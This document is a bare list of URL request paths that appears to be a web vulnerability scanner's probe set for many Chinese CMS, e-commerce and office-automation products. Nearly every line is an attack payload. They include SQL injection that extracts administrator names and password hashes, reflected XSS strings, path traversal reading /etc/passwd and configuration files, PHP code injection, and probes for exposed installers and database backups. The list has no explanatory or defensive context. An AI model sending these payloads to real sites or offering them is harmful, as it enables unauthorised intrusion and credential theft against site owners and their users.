/jiaoyou.php?pid=1'%20or%20@%60'%60%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,sha1(0x3336307765627363616e),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@%60'%60%20and%20'1'='1
/index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
/subscribe.php?act=dounsubscribe
/productbuy/checkout.asp?11_22.html
/data/%23data.asp
/manage/Config/BackupRestore.aspx
/install/index.php.bak?insLockfile=1
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35
/?cart-addGoodsToCart.html
/install/index.php?step=active
/index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
/install/index.php?step=1&insLockfile=1
/plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
/plus/ad_js.php?aid=1&nocache=1
/admin.php
/resume/?key=xxxx%bf%22;alert(360);//
/register.php?do=check
/about/?module=../robots.txt&fmodule=7
/plus/Promotion.asp
/besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60
/index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
/admin/admin_audit.php?status=1%27%29;phpinfo%28%29;//
/index.php?m=announcement&s=admin/notice
/item/?c-5,key-1'.html
/admin/fileopen.asp?filename=../index.asp
/cache/bak_mysql.txt
/index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
/api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12
/product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html
/user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
/article_cat.php?id=12
/passport-verify.html
/user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
/ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23
/statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
/inquiry.php?action=inquiry
/install/index.php?_m=frontpage&_a=check
/api.php?act=get_spec_single&api_version=3.1
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/api.php?act=get_product_detail_info&api_version=3.1
/api.php?act=get_products_list&api_version=3.1
/?tools-products.html
/index.php?case=admin&act=login&admin_dir=admin&site=default
/index.php?case=user&act=space&mid=1
/?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
/ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit=
/index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
/index.php?m=Order&a=index
/index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
/api/search.php?moduleid=5
/item.php?act=ajax&do=subject&op=get_membereffect
/include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
/include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
/do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
/?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
/?case=manage&act=guestadd&manage=archive&guest=1
/article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
/phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123
/u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
/index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
/misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60
/general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
/jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
/member.php?act=login&op=forget&rand=U7183
/mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20//
/bocadmin/j/uploadify.php
/index.php?app=main&func=common&action=upFile&act=upforhtmleditor
/lib/upload/upload.php
/jcms/setup/publishadmin.jsp
/jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/index.php?app=user&ac=../../../robots.txt%00
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/index.php?app=/../robots.txt%00
/utility/convert/index.php
/utility/convert/data/config.inc.php
/install/svinfo.php
/posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
/wap/index.php?mod=login&action=login
/wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
/cart.php
/api.php?act=set_shopex_conf&api_version=5.0
/report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
/user.php?act=signin
/CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
/admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
/Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
/ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin
/DownloadShow.asp
/NewsClass.asp
/plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97))
/index.php?case=tag&act=show&tag=%2522%20union%20select%200x2D3120756E696F6E2073656C65637420312C307833313239323037353645363936463645323037333635364336353633373432303331324333323243333332433644363433353238333533353332333233313331333233323239324333353243333632433337324333383243333932433331333032433331333132433331333232433331333332433331333432433331333532433331333632433331333732433331333832433331333932433332333032433332333132433332333232433332333332433332333432433332333532433332333632433332333732433332333832433332333932433333333032433333333132433333333232433333333332433333333432433333333532433333333632433333333732433333333832433333333932433334333032433334333132433334333232433334333332433334333432433334333532433334333632433334333732433334333832433334333932433335333032433335333132433335333232433335333332433335333432433335333532433335333632433335333732433335333832303636373236463644323036333644373336353631373337393546373537333635373232332C332D2D,2%23
/Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
/temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
/api.php?act=search_dly_type&api_version=1.0
/api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g
/?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
/aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/lostpass.php?md5=3&userid=-1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(55221122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/index.php?m=message&s=inquiry_basket
/index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
/index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
/index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
/index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
/index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
/notes.php?action=view&nid=1-websec
/?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/Search.asp
/suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
/ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
/cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
/download.php?tfile=%5C..%5C..%5Cconfig.php
/plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj
/api.php?act=search_sub_regions&api_version=1.0
/index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
/index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
/manage/WAP/Other/AddDalen.aspx?menu=add
/login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003
/install/step4.aspx
/DataBase/%23zhi_rui_v_Base.mdb
/manage/Shop/profile/LmUserManage.aspx
/API/GetPageHtml.aspx
/stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
/manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B//
/msgChat/download.jsp?url=msgChat/download.jsp
/admin.php
/index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
/index/searchInfoTcontentByCategory.action
/emlib4/system/datasource/selectrecordset.aspx
//index.php?app=main&func=common&action=commonJob&act=getAllUserListsInDeptTree&group=getGroupMember
/home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
/web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
/ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc
/index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/AIP/upload.php?RUN_ID=1&T_ID=1
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1
/index.php?m=company&s=admin/business_info_list
/index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
/getpwd4.asp
/?m=offer&s=offer_list&id=1-webscan%23
/MemberLogin.asp
/views.asp
/basket.asp?h%77_id=513%20and%201=2
/protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin
/index.php?app=tag&ac=add&ts=do
/member/index.php?ugid31=51'%20and%20'1122'='12
/siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
/UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);--
/search.php?mod=information&ids=1-webscan&catid=1
/box.php?
/siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
/siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
//siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
/siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
/downLoadFile.action?filePath=/WEB-INF/web.xml
/siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
/job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
/searchLines.aspx?LName=h%25';
/ProductBuy.Asp
/newssearch.aspx?skey=1%25'%20and%201=char(106)%20--
/searchLines.aspx?LName=h&t=webscan()'
/viewlist.aspx?typeid=webscan()'
/company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
/resource/avatar/avatar.php?a=uploadavatar&input=uid%3D1122.php
/?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
/admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122
/index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
/gallery--p,0,1122%20and%200-0---1.html
/?m=info.detail&id=1-webscan
/misc.php?mod=getuserinfo&uid=-1
/?m=city.getSearch&index=reer
/?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
/admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/Product.asp
/user/getpassword.asp
/admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
/plus/ajax_user.php?act=check_email
/plus/ajax_user.php?act=check_usname
/HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
/ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
/index.php?app=user&ac=plugin&in=../../robots.txt%00
/member.php?act=login&op=forget
/item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
/?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
/index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
/?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
/index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
/index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
/wap/index.php
/deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
/statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
/member/index.php
/wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
